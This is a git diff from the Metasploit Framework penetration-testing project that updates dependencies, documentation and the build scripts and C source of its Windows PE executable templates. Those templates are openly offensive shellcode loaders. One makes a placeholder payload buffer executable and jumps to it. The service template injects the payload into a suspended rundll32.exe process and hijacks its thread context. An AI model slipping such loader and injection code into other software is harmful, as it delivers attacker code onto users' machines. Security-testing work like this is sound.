Merge pull request #20502 from zeroSteiner/feat/refactor-pe-compiling

Update PE EXE Templates
automatic module_metadata_base.json update
2025-09-10 12:37:35 +02:00 · 2025-09-10 08:23:55 +00:00 · 2025-09-10 10:12:41 +02:00 · 2025-09-09 14:36:48 +00:00 · 2025-09-09 16:25:24 +02:00 · 2025-09-09 10:02:06 -04:00
231 changed files with 9318 additions and 2135 deletions
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.0'
+          - '3.3'

    name: Ruby ${{ matrix.ruby }}
    steps:
@@ -44,6 +44,7 @@ on:
      - 'Gemfile.lock'
      - 'data/templates/**'
      - 'modules/payloads/**'
+      - 'lib/msf/base/sessions/**'
      - 'lib/msf/core/payload/**'
      - 'lib/msf/core/**'
      - 'test/modules/**'
@@ -85,7 +85,7 @@ When reporting Metasploit issues:
 * **Don't** attempt to report issues on a closed PR.

 If you need some more guidance, talk to the main body of open source contributors over on our
-[Metasploit Slack] or [#metasploit on Freenode IRC].
+[GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) or [Metasploit Slack]

 Finally, **thank you** for taking the few moments to read this far! You're already way ahead of the
 curve, so keep it up!
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.4.78)
+    metasploit-framework (6.4.87)
      aarch64
      abbrev
      actionpack (~> 7.2.0)
@@ -47,7 +47,7 @@ PATH
      metasploit-model
      metasploit-payloads (= 2.0.221)
      metasploit_data_models (>= 6.0.7)
-      metasploit_payloads-mettle (= 1.0.42)
+      metasploit_payloads-mettle (= 1.0.45)
      mqtt
      msgpack (~> 1.6.0)
      mutex_m
@@ -65,6 +65,7 @@ PATH
      openvas-omp
      ostruct
      packetfu
+      parallel
      patch_finder
      pcaprub
      pdf-reader
@@ -358,7 +359,7 @@ GEM
      railties (~> 7.0)
      recog
      webrick
-    metasploit_payloads-mettle (1.0.42)
+    metasploit_payloads-mettle (1.0.45)
    method_source (1.1.0)
    mime-types (3.6.0)
      logger
@@ -500,11 +501,12 @@ GEM
      rex-arch
    rex-ole (0.1.9)
      rex-text
-    rex-powershell (0.1.101)
+    rex-powershell (0.1.103)
+      bigdecimal
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.16)
+    rex-random_identifier (0.1.20)
      bigdecimal
      rex-text
    rex-registry (0.1.6)
@@ -682,4 +684,4 @@ DEPENDENCIES
  yard

 BUNDLED WITH
-   2.5.10
+   2.5.22
@@ -26,38 +26,38 @@ aws-sigv4, 1.11.0, "Apache 2.0"
 base64, 0.2.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
 bcrypt_pbkdf, 1.1.1, MIT
-benchmark, 0.4.0, "ruby, Simplified BSD"
-bigdecimal, 3.1.9, "ruby, Simplified BSD"
+benchmark, 0.4.1, "ruby, Simplified BSD"
+bigdecimal, 3.2.2, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
 bootsnap, 1.18.4, MIT
 bson, 5.0.2, "Apache 2.0"
 builder, 3.3.0, MIT
-bundler, 2.5.10, MIT
+bundler, 2.5.22, MIT
 byebug, 11.1.3, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.3.4, MIT
-connection_pool, 2.5.0, MIT
+concurrent-ruby, 1.3.5, MIT
+connection_pool, 2.5.3, MIT
 cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
 csv, 3.3.2, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
 date, 3.4.1, "ruby, Simplified BSD"
 debug, 1.10.0, "ruby, Simplified BSD"
-diff-lcs, 1.6.0, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
+diff-lcs, 1.6.2, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
 dnsruby, 1.72.4, "Apache 2.0"
 docile, 1.4.1, MIT
 domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
-drb, 2.2.1, "ruby, Simplified BSD"
+drb, 2.2.3, "ruby, Simplified BSD"
 ed25519, 1.3.0, MIT
 elftools, 1.3.1, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.3, MIT
-erb, 5.0.1, "ruby, Simplified BSD"
+erb, 5.0.2, "ruby, Simplified BSD"
 erubi, 1.13.1, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.5.1, MIT
-factory_bot_rails, 6.4.4, MIT
+factory_bot, 6.5.4, MIT
+factory_bot_rails, 6.5.0, MIT
 faker, 3.5.1, MIT
 faraday, 2.7.11, MIT
 faraday-net_http, 3.0.2, MIT
@@ -78,7 +78,7 @@ http-cookie, 1.0.8, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.9.0, ruby
 i18n, 1.14.7, MIT
-io-console, 0.8.0, "ruby, Simplified BSD"
+io-console, 0.8.1, "ruby, Simplified BSD"
 ipaddr, 1.2.7, "ruby, Simplified BSD"
 irb, 1.15.2, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
@@ -90,21 +90,21 @@ lint_roller, 1.1.0, MIT
 little-plugger, 1.1.4, MIT
 logger, 1.6.6, "ruby, Simplified BSD"
 logging, 2.4.0, MIT
-loofah, 2.24.0, MIT
+loofah, 2.24.1, MIT
 lru_redux, 1.1.0, MIT
 memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 5.0.5, "New BSD"
 metasploit-credential, 6.0.16, "New BSD"
-metasploit-framework, 6.4.78, "New BSD"
+metasploit-framework, 6.4.87, "New BSD"
 metasploit-model, 5.0.4, "New BSD"
 metasploit-payloads, 2.0.221, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 6.0.9, "New BSD"
-metasploit_payloads-mettle, 1.0.42, "3-clause (or ""modified"") BSD"
+metasploit_payloads-mettle, 1.0.45, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
 mime-types, 3.6.0, MIT
 mime-types-data, 3.2025.0304, MIT
-mini_portile2, 2.8.8, MIT
+mini_portile2, 2.8.9, MIT
 minitest, 5.25.5, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
@@ -121,7 +121,7 @@ net-ssh, 7.3.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.7.4, "MIT, Simplified BSD"
-nokogiri, 1.18.3, MIT
+nokogiri, 1.18.9, MIT
 nori, 2.7.1, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
@@ -145,23 +145,23 @@ psych, 5.2.6, MIT
 public_suffix, 6.0.1, MIT
 puma, 6.6.0, "New BSD"
 racc, 1.8.1, "ruby, Simplified BSD"
-rack, 2.2.13, MIT
+rack, 2.2.17, MIT
 rack-protection, 3.2.0, MIT
 rack-session, 1.0.2, MIT
 rack-test, 2.2.0, MIT
 rackup, 1.0.1, MIT
-rails-dom-testing, 2.2.0, MIT
+rails-dom-testing, 2.3.0, MIT
 rails-html-sanitizer, 1.6.2, MIT
 railties, 7.2.2.1, MIT
 rainbow, 3.1.1, MIT
-rake, 13.2.1, MIT
+rake, 13.3.0, MIT
 rasn1, 0.14.0, MIT
 rb-readline, 0.5.5, BSD
-rdoc, 6.14.0, ruby
+rdoc, 6.14.2, ruby
 recog, 3.1.14, unknown
 redcarpet, 3.6.1, MIT
 regexp_parser, 2.10.0, MIT
-reline, 0.6.0, ruby
+reline, 0.6.2, ruby
 require_all, 3.0.0, MIT
 rex-arch, 0.1.18, "New BSD"
 rex-bin_tools, 0.1.10, "New BSD"
@@ -172,8 +172,8 @@ rex-java, 0.1.8, "New BSD"
 rex-mime, 0.1.11, "New BSD"
 rex-nop, 0.1.4, "New BSD"
 rex-ole, 0.1.9, "New BSD"
-rex-powershell, 0.1.101, "New BSD"
-rex-random_identifier, 0.1.16, "New BSD"
+rex-powershell, 0.1.103, "New BSD"
+rex-random_identifier, 0.1.20, "New BSD"
 rex-registry, 0.1.6, "New BSD"
 rex-rop_builder, 0.1.6, "New BSD"
 rex-socket, 0.1.62, "New BSD"
@@ -185,12 +185,12 @@ rexml, 3.4.1, "Simplified BSD"
 rinda, 0.2.0, "ruby, Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.13.0, MIT
-rspec-core, 3.13.3, MIT
-rspec-expectations, 3.13.3, MIT
-rspec-mocks, 3.13.2, MIT
-rspec-rails, 8.0.0, MIT
+rspec-core, 3.13.5, MIT
+rspec-expectations, 3.13.5, MIT
+rspec-mocks, 3.13.5, MIT
+rspec-rails, 8.0.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.13.2, MIT
+rspec-support, 3.13.4, MIT
 rubocop, 1.75.7, MIT
 rubocop-ast, 1.44.1, MIT
 ruby-macho, 4.1.0, MIT
@@ -216,7 +216,7 @@ swagger-blocks, 3.0.0, MIT
 syslog, 0.3.0, "ruby, Simplified BSD"
 test-prof, 1.4.4, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
-thor, 1.3.2, MIT
+thor, 1.4.0, MIT
 tilt, 2.6.0, MIT
 timecop, 0.9.10, MIT
 timeout, 0.4.3, "ruby, Simplified BSD"
@@ -240,4 +240,4 @@ xdr, 3.0.3, "Apache 2.0"
 xml-simple, 1.1.9, MIT
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
 yard, 0.9.37, MIT
-zeitwerk, 2.7.2, MIT
+zeitwerk, 2.7.3, MIT
@@ -18,7 +18,14 @@ Submit bugs and feature requests via the [GitHub Issues](https://github.com/rapi
 For information on writing modules, refer to the [API Documentation](https://docs.metasploit.com/api/).

 ## Support and Communication
-For questions and suggestions, join the Freenode IRC channel or contact the metasploit-hackers mailing list.
+For questions and suggestions, you can:
+
+- Join our [GitHub Discussions](https://github.com/rapid7/metasploit-framework/discussions) for community support and general questions
+- Join the [Metasploit Slack](https://join.slack.com/t/metasploit/shared_invite/zt-30i688it0-mJsFGT44IMtdeZi1DraamQ) for real-time chat
+- Submit [GitHub Issues](https://github.com/rapid7/metasploit-framework/issues) for bug reports and feature requests
+- Follow [@metasploit](https://x.com/metasploit) on X or [@metasploit@infosec.exchange](https://infosec.exchange/@metasploit) on Mastodon for updates
+
+**Note:** Some community members may still use IRC channels and the metasploit-hackers mailing list, though the primary support channels are now GitHub Discussions and Slack.

 ## Installing Metasploit

@@ -4,6 +4,26 @@ Fiddle.const_set(:VERSION, '0.0.0') unless Fiddle.const_defined?(:VERSION)
 require 'rails'
 require File.expand_path('../boot', __FILE__)

+require 'action_view'
+# Monkey patch https://github.com/rails/rails/blob/v7.2.2.1/actionview/lib/action_view/helpers/tag_helper.rb#L51
+# Might be fixed by 8.x https://github.com/rails/rails/blob/v8.0.2/actionview/lib/action_view/helpers/tag_helper.rb#L51C1-L52C1
+raise unless ActionView::VERSION::STRING == '7.2.2.1' # A developer will need to ensure this is still required when bumping rails
+module ActionView::Helpers::TagHelper
+  class TagBuilder
+    def self.define_element(name, code_generator:, method_name: name.to_s.underscore)
+      code_generator.define_cached_method(method_name, namespace: :tag_builder) do |batch|
+        # Fixing a bug introduced by Metasploit's global Kernel patch: https://github.com/rapid7/metasploit-framework/blob/ae1db09f32cd04c007dbf445cf16dc22c9fc2e53/lib/rex.rb#L74-L79
+        # which fails when using the below 'instance_methods.include?(method_name.to_sym)' check
+        batch.push(<<~RUBY) # unless instance_methods.include?(method_name.to_sym)
+              def #{method_name}(content = nil, escape: true, **options, &block)
+                tag_string("#{name}", content, options, escape: escape, &block)
+              end
+            RUBY
+      end
+    end
+  end
+end
+
 all_environments = [
    :development,
    :production,
@@ -1,8 +1,8 @@
 # PE Source Code
 This directory contains the source code for the PE executable templates.

-## Building DLLs
-Use the provided `build_dlls.bat` file, and run it from within the Visual Studio
+## Building
+Use the provided `build_all.bat` file, and run it from within the Visual Studio
 developer console. The batch file requires that the `%VCINSTALLDIR%` environment
 variable be defined (which it should be by default). The build script will
 create both the x86 and x64 templates before moving them into the correct
@@ -0,0 +1,17 @@
+@echo off
+
+echo Compiling DLLs
+
+for /D %%d in (dll*) do (
+  pushd "%%d"
+  call build.bat
+  popd
+)
+
+echo Compiling EXEs
+
+for /D %%e in (exe*) do (
+  pushd "%%e"
+  call build.bat
+  popd
+)
@@ -1,7 +0,0 @@
-@echo off
-
-for /D %%d in (dll*) do (
-  pushd "%%d"
-  build.bat
-  popd
-)
@@ -3,6 +3,7 @@
 if "%~1"=="" GOTO NO_ARGUMENTS
 echo Compiling for: %1
 call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+rem mscoree.lib requires .NET SDK to be installed, add it as a Visual Studio component
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
 exit /B
@@ -0,0 +1,13 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /GS- template.c /Fe:template_%1_windows.exe /link kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj *.res
+move *.exe ..\..\..
@@ -1,26 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "service", "service.vcproj", "{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Release|Win32 = Release|Win32
-		Release|x64 = Release|x64
-		Debug|Win32 = Debug|Win32
-		Debug|x64 = Debug|x64
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.ActiveCfg = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.Build.0 = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.ActiveCfg = Release|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.Build.0 = Release|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.ActiveCfg = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.Build.0 = Release|Win32
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.ActiveCfg = Debug|x64
-		{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.Build.0 = Debug|x64
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal
@@ -1,343 +0,0 @@
-<?xml version="1.0" encoding="Windows-1252"?>
-<VisualStudioProject
-	ProjectType="Visual C++"
-	Version="9.00"
-	Name="service"
-	ProjectGUID="{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
-	RootNamespace="service"
-	Keyword="Win32Proj"
-	TargetFrameworkVersion="196613"
-	>
-	<Platforms>
-		<Platform
-			Name="Win32"
-		/>
-		<Platform
-			Name="x64"
-		/>
-	</Platforms>
-	<ToolFiles>
-	</ToolFiles>
-	<Configurations>
-		<Configuration
-			Name="Debug|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="4"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Debug|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
-				RuntimeLibrary="0"
-				BufferSecurityCheck="false"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-				CallingConvention="2"
-				CompileAs="1"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="../../../../service.exe"
-				LinkIncremental="1"
-				GenerateManifest="false"
-				GenerateDebugInformation="false"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="1"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
-				RuntimeLibrary="0"
-				BufferSecurityCheck="false"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-				CallingConvention="2"
-				CompileAs="1"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="../../../../template_x64_windows_svc.exe"
-				LinkIncremental="1"
-				GenerateManifest="false"
-				GenerateDebugInformation="false"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-	</Configurations>
-	<References>
-	</References>
-	<Files>
-		<Filter
-			Name="Source Files"
-			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
-			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
-			>
-			<File
-				RelativePath=".\service.c"
-				>
-			</File>
-		</Filter>
-	</Files>
-	<Globals>
-	</Globals>
-</VisualStudioProject>
@@ -1,11 +1,11 @@
-#include <stdio.h>
+#include <windows.h>

 #define SCSIZE 4096
-char payload[SCSIZE] = "PAYLOAD:";
+char bPayload[SCSIZE] = "PAYLOAD:";

-char comment[512] = "";
-
-int main(int argc, char **argv) {
-	(*(void (*)()) payload)();
-	return(0);
+void main() {
+	DWORD dwOldProtect;
+	VirtualProtect(bPayload, SCSIZE, PAGE_EXECUTE_READWRITE, &dwOldProtect);
+	(*(void (*)()) bPayload)();
+	return;
 }
@@ -1,32 +0,0 @@
-; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
-; Architecture: x64
-;
-; Assemble and link with the following command:
-; "C:\Program Files\Microsoft Visual Studio 9.0\VC\bin\x86_amd64\ml64" template_x64_windows.asm /link /subsystem:windows /defaultlib:"C:\Program Files\Microsoft SDKs\Windows\v6.0A\Lib\x64\kernel32.lib" /entry:main 
-
-extrn ExitProcess : proc
-extrn VirtualAlloc : proc
-
-.code
-
-	main proc 
-		sub rsp, 40        ;
-		mov r9, 40h        ; 
-		mov r8, 3000h      ; 
-		mov rdx, 4096      ; 
-		xor rcx, rcx       ; 
-		call VirtualAlloc  ; lpPayload = VirtualAlloc( NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
-		mov rcx, 4096      ;
-		mov rsi, payload   ;
-		mov rdi, rax       ;
-		rep movsb          ; memcpy( lpPayload, payload, 4096 );
-		call rax           ; lpPayload();
-		xor rcx, rcx       ;
-		call ExitProcess   ; ExitProcess( 0 );
-	main endp
-	
-	payload proc
-		A byte 'PAYLOAD:'
-		B db 4096-8 dup ( 0 )
-	payload endp
-end
@@ -0,0 +1,13 @@
+@echo off
+
+if "%~1"=="" GOTO NO_ARGUMENTS
+echo Compiling for: %1
+call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
+cl /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows_svc.exe /link advapi32.lib kernel32.lib /entry:main /subsystem:WINDOWS /NODEFAULTLIB
+exit /B
+
+:NO_ARGUMENTS
+%COMSPEC% /c "%0" x86
+%COMSPEC% /c "%0" x64
+del  *.obj *.res
+move *.exe ..\..\..
@@ -1,16 +1,28 @@
 #define WIN32_LEAN_AND_MEAN
 #include <windows.h>

-#define PAYLOAD_SIZE	8192
+#define SCSIZE 8192

 char cServiceName[32] = "SERVICENAME";

-char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";
+char bPayload[SCSIZE] = "PAYLOAD:";

 SERVICE_STATUS ss;

 SERVICE_STATUS_HANDLE hStatus = NULL;

+#if BUILDMODE == 2
+/* hand-rolled bzero allows us to avoid including ms vc runtime */
+void inline_bzero(void *p, size_t l)
+{
+	BYTE *q = (BYTE *)p;
+	size_t x = 0;
+	for (x = 0; x < l; x++)
+		*(q++) = 0x00;
+}
+
+#endif
+
 /*
 *
 */
@@ -34,9 +46,9 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	PROCESS_INFORMATION pi;
 	LPVOID lpPayload = NULL;

-	ZeroMemory( &ss, sizeof(SERVICE_STATUS) );
-	ZeroMemory( &si, sizeof(STARTUPINFO) );
-	ZeroMemory( &pi, sizeof(PROCESS_INFORMATION) );
+	inline_bzero( &ss, sizeof(SERVICE_STATUS) );
+	inline_bzero( &si, sizeof(STARTUPINFO) );
+	inline_bzero( &pi, sizeof(PROCESS_INFORMATION) );

 	si.cb = sizeof(STARTUPINFO);

@@ -47,7 +59,7 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 	ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;

 	hStatus = RegisterServiceCtrlHandler( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );
-  
+
 	if ( hStatus )
 	{
 		ss.dwCurrentState = SERVICE_RUNNING;
@@ -57,30 +69,30 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 		if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )
 		{
 			Context.ContextFlags = CONTEXT_FULL;
-		  
+
 			GetThreadContext( pi.hThread, &Context );
-		  
-			lpPayload = VirtualAllocEx( pi.hProcess, NULL, PAYLOAD_SIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
+
+			lpPayload = VirtualAllocEx( pi.hProcess, NULL, SCSIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
 			if( lpPayload )
 			{
-				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, PAYLOAD_SIZE, NULL );
+				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, SCSIZE, NULL );
 #ifdef _WIN64
-				Context.Rip = (DWORD64)lpPayload;
+				Context.Rip = (ULONG_PTR)lpPayload;
 #else
-				Context.Eip = (DWORD)lpPayload;
+				Context.Eip = (ULONG_PTR)lpPayload;
 #endif
 				SetThreadContext( pi.hThread, &Context );
 			}

 			ResumeThread( pi.hThread );
-			
+
 			CloseHandle( pi.hThread );
-		  
+
 			CloseHandle( pi.hProcess );
 		}
-		
+
 		ServiceHandler( SERVICE_CONTROL_STOP );
-		
+
 		ExitProcess( 0 );
 	}
 }
@@ -88,12 +100,13 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
 /*
 *
 */
-int __stdcall WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
+void main()
 {
-	SERVICE_TABLE_ENTRY st[] = 
-    { 
-        { (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain }, 
-        { NULL, NULL } 
-    };
-	return StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
+	SERVICE_TABLE_ENTRY st[] =
+		{
+			{ (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain },
+			{ NULL, NULL }
+		};
+	StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
+	return;
 }
@@ -6702,7 +6702,7 @@
    "autofilter_ports": [],
    "autofilter_services": [],
    "targets": null,
-    "mod_time": "2025-01-29 14:25:33 +0000",
+    "mod_time": "2025-08-11 11:41:05 +0000",
    "path": "/modules/auxiliary/admin/kerberos/get_ticket.rb",
    "is_install_path": true,
